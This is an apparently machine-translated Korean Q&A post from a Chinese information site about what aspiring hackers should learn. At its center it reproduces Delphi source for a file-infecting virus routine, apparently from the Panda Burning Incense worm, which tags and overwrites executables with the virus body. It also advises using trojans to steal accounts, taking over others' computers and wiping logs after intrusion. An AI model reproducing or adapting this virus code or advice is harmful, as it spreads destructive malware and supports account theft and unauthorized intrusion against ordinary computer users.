현재 위치 - 중국 분류 정보 발표 플랫폼 - 생활 서비스 정보 - 해커가 배워야 할 가장 기본적인 것은 무엇인가요?

해커가 배워야 할 가장 기본적인 것은 무엇인가요?

해커의 종류는 다양합니다

공격(해커)하려면 먼저 보안을 배워야 합니다. 죽일 수 없는 바이러스를 만나면 해결 방법도 배워야 합니다. 수동으로 수행하고 매번 시스템을 손상시키지 마십시오

p>

크래킹(크래커)을 배우고 싶다면 어셈블리와 프로그래밍을 최소한 배울 수 있어야 합니다. winhex를 사용하고 최소한 일반적으로 암호화되지 않은 소프트웨어를 크랙하고 일반 텍스트 등록 코드를 비교할 수 있어야 합니다.

만드는 법을 배우고 싶습니다. 트로이 목마를 만들려면 CPU와 다양한 소프트웨어를 이해해야 합니다. , 그리고 프로그래밍에도 능숙해야 합니다. 보안 보호를 우회하고 팬더 향을 피우는 핵심 문장과 같은 강력한 트로이 목마를 컴파일하려면 가능한 한 적은 수의 문장을 사용해야 합니다.

절차 InfectOneFile(FileName : 문자열);

var

HdrStream, SrcStream: TFileStream;

IcoStream, DstStream: TMemoryStream;

iID: LongInt ;< /p>

aIcon: TIcon;

감염됨, IsPE: 부울;

i: 정수;

Buf: 배열[0.. 1] of Char;

begin

try //파일을 사용하고 있는 중 오류가 발생하면 종료하세요.

if CompareText(FileName, 'JAPUSSY.EXE' ) = 0 then //본인이라면 감염되지 않습니다

Exit;

Infected := False;

IsPE := False;< /p>

SrcStream := TFileStream.Create(FileName, fmOpenRead);

try

for i := 0 to $108 do //PE 파일 헤더 확인

시작

SrcStream.Seek(i, soFromBeginning);

SrcStream.Read(Buf, 2);

if (Buf[0] = #80) 및 (Buf [1] = #69) //PE 표시

시작

IsPE := True; //PE 파일입니다.

Break;

end;

end;

SrcStream.Seek(-4, soFromEnd); //감염 플래그 확인

< p> SrcStream.Read(iID, 4 );

if (iID = ID) 또는 (SrcStream.Size < 10240) then //너무 작은 파일은 감염되지 않습니다.

Infected := True;

finally

SrcStream.Free;

end;

if Infected 또는 (IsPE 아님) then // PE 파일이 감염되었거나 감염되지 않은 경우 종료< /p>

종료;

IcoStream := TMemoryStream.Create;

DstStream := TMemoryStream.

Create;

try

aIcon := TIcon.Create;

try

//감염된 파일의 메인 아이콘 가져오기( 744 바이트), 스트림에 저장됨

aIcon.ReleaseHandle;

aIcon.Handle := ExtractIcon(HInstance, PChar(FileName), 0);

aIcon .SaveToStream(IcoStream);

마지막으로

aIcon.Free;

end;

SrcStream := TFileStream.Create(FileName , fmOpenRead);

//헤더 파일

HdrStream := TFileStream.Create(ParamStr(0), fmOpenRead 또는 fmShareDenyNone);

시도

//바이러스 메인 아이콘 앞에 데이터 쓰기

CopyStream(HdrStream, 0, DstStream, 0, IconOffset);

//바이러스 메인 아이콘 쓰기 현재 프로그램

CopyStream(IcoStream, 22, DstStream, IconOffset, IconSize);

//바이러스 메인 아이콘과 바이러스 꼬리 사이에 데이터 쓰기

p>

CopyStream(HdrStream, IconTail, DstStream, IconTail, HeaderSize - IconTail);

//호스트 프로그램에 쓰기

CopyStream(SrcStream, 0, DstStream, HeaderSize , SrcStream.Size);

//감염된 태그 쓰기

DstStream.Seek(0, 2);

iID := $44444444;

DstStream.Write(iID, 4);

마침내

HdrStream.Free;

end;

마침내

p>< p> SrcStream.Free;

IcoStream.Free;

DstStream.SaveToFile(FileName); //호스트 파일 교체

DstStream.Free ;

end;

제외;

end;

end;

그냥 신인이 되고 싶어 (하급 해커, 특별한 기술은 없다고 할 수 있음) 트로이 목마를 사용하여 계정을 훔치고 브로일러를 찾는 방법도 배워야 하며, 다른 사람의 컴퓨터에 침입한 후 로그를 분쇄하는 방법도 알아야 합니다

간단히 , 먼저 외부 세계와의 정보 흐름을 유지하고 새로운 정보를 따라갈 수 있어야합니다. 이 소프트웨어의 허점은 무엇인지, 트로이 목마 바이러스의 특징은 무엇인지, 그리고 많은 컴퓨터 지식을 배웠습니다. cmd, regedit, gp를 유창하게 사용하세요.

edit.msc 및 기타 Windows 구성 요소)을 작성하고 일부 취약점을 적어서 악용해야 해커라고 불릴 수 있습니다.